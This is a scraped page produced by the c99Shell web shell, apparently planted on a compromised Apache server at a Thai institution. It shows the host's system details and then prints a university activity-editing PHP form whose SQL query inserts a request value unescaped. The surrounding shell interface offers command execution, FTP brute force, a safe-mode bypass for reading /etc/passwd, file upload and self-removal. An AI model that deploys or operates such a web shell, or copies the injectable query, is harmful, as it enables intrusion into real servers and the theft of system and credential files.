!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/Std_Acc_depart/Foster/   drwxr-xr-x
Free 52.41 GB of 127.8 GB (41.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     FrmEdit.php (7.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
   
include("../../Include/FunctionDB.php");
   include(
"../../include/Function.php");
   
ConnectDB();
   
$sql "Select * From cul_activity_tb Where code='$code'";
   
$result mysql_query($sql) or die("Error with SQL".mysql_error());
   
$rs mysql_fetch_array($result);
   
?>
<html>
<head>
<title>Add Project and Course</title>
<link rel="stylesheet" href="../../css/style1.css" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
</head>

<body bgcolor="#FFFFFF">
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#006699">
  <tr bgcolor="#DFE4EC"> 
    <td colspan="3"> 
      <div align="center"><strong><font color="#FF3333" size="4" face="Tahoma">แก้ไข</font><font color="#003366" size="4" face="Tahoma"> 
        งานทำนุบำรุงศิลปวัฒนธรรม</font></strong></div></td>
  </tr>
  <form action="EditActivity.php" method="post">
    <tr bgcolor="#EEEEEE"> 
      <td width="38%"> <div align="center"><font color="#003366" size="2" face="Tahoma">ชื่อโครงการ 
          / กิจกรรม</font></div></td>
      <td width="2%" bordercolor="#006699">&nbsp;</td>
      <td width="60%" bordercolor="#006699"> <input name="Activity_name" type="text" class="input1" id="Activity_name" value="<? echo $rs[Activity_name]?>"  size="60"></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">ประเภท</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><font size="2" face="Tahoma"> 
        <input type="radio" name="Activity_type" <?php if (!(strcmp("$rs[Activity_type]",งานภายใน))) {echo "checked";} ?> value="งานภายใน">
        งานภายใน 
        <input type="radio" name="Activity_type" <?php if (!(strcmp("$rs[Activity_type]",งานภายนอก))) {echo "checked";} ?> value="งานภายนอก">
        งานภายนอก</font></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td height="20"><div align="center"><font color="#003366" size="2" face="Tahoma">การดำเนืนงาน</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"> <p> <font size="2" face="Tahoma"> 
          <input type="radio" name="Perform" <?php if (!(strcmp("$rs[Perform]",ดำเนินการโดยอาจารย์))) {echo "checked";} ?> value="ดำเนินการโดยอาจารย์">
          ดำเนินการโดยอาจารย์ 
          <input type="radio" name="Perform" <?php if (!(strcmp("$rs[Perform]",ดำเนินการโดยองค์กรนักศึกษา))) {echo "checked";} ?> value="ดำเนินการโดยองค์กรนักศึกษา">
          ดำเนินการโดยองค์กรนักศึกษา </font></p></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">กิจกรรม</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"> <select name="Activity" id="Activity">
          <option value="กิจกกรมพัฒนานักศึกษา">กิจกกรมพัฒนานักศึกษา</option>
          <option value="กิจกกรมแนะแนว">กิจกกรมแนะแนว</option>
          <option value="กิจกรรมทำนุบำรุงฯ">กิจกรรมทำนุบำรุงฯ</option>
          <option value="ฯลฯ">ฯลฯ</option>
        </select></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td bgcolor="#EEEEEE"> <div align="center"><font color="#003366" size="2" face="Tahoma">ระยะเวลา</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><font color="#000000" size="2" face="Tahoma"> 
        <input name="Period" type="text" class="input1" id="Period" value="<? echo $rs[Period?>" size="50">
        </font></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">งบประมาณ</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><input name="Fund" type="text" id="Fund" value="<? echo $rs[Fund]?>" size="20"> 
        <font size="2" face="Tahoma">บาท</font> </td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">แหล่งที่มา</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><textarea name="Source" cols="40" id="Source"><? echo $rs[Source]?></textarea></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td><div align="center"><font color="#003366" size="2" face="Tahoma">กลุ่มเป้าหมาย</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><textarea name="Target" cols="40" id="Target"><? echo $rs[Target]?></textarea></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">จำนวนผู้เข้าร่วมการ</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"> <input name="Amount" type="text" id="Amount" value="<? echo $rs[Amount]?>">
        <font size="2" face="Tahoma">คน</font> </td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td>
<div align="center"><font color="#003366" size="2" face="Tahoma">ผู้รับผิดชอบ</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699">
<textarea name="Supervisor" cols="40" id="Supervisor"><? echo $rs[Supervisor]?></textarea></td>
    </tr>
    <tr bgcolor="#EEEEEE">
      <td>&nbsp;</td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"><font size="2" face="Tahoma"> 
        <input type="radio" name="Duty" <?php if (!(strcmp("$rs[Duty]",หัวหน้าโครงการ))) {echo "checked";} ?> value="หัวหน้าโครงการ">
        หัวหน้าโครงการ 
        <input type="radio" name="Duty" <?php if (!(strcmp("$rs[Duty]",ผู้ร่วมโครงการ))) {echo "checked";} ?> value="ผู้ร่วมโครงการ">
        ผู้ร่วมโครงการ</font></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">วัตถุประสงค์</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"> <textarea name="Objective" cols="50" rows="5" id="Objective"><? echo $rs[Objective]?></textarea></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">ดัชนีชี้วัดความสำเร็จของงาน</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"> <textarea name="Index_mature" cols="50" rows="5" id="Index_mature"><? echo $rs[Index_mature]?></textarea></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">คุณลักษณะที่พึงประสงค์</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"> <textarea name="Spec" cols="50" rows="5" id="Spec"><? echo $rs[Spec]?></textarea> 
      </td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">สมรรถนะชั้นปี</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699"> <textarea name="Affect_class" cols="50" rows="5" id="Affect_class"><? echo $rs[Affect_class]?></textarea></td>
    </tr>
    <tr bgcolor="#EEEEEE"> 
      <td> <div align="center"><font color="#003366" size="2" face="Tahoma">วิธีการวัด 
          / ผลการประเมิน</font></div></td>
      <td bordercolor="#006699">&nbsp;</td>
      <td bordercolor="#006699" bgcolor="#EEEEEE"> <font color="#003366" size="2" face="Tahoma"> 
        <textarea name="Asses" cols="50" rows="5" id="textarea5"><? echo $rs[Asses]?></textarea>
        </font></td>
    </tr>
    <tr bgcolor="#DFE4EC"> 
      <td colspan="3"> 
        <div align="center"> 
          <input name="code" type="hidden" id="code" value="<? echo $rs[code]?>">
          <input type="submit" name="Submit" value="    บันทึก    ">
        </div></td>
    </tr>
  </form>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.012 ]--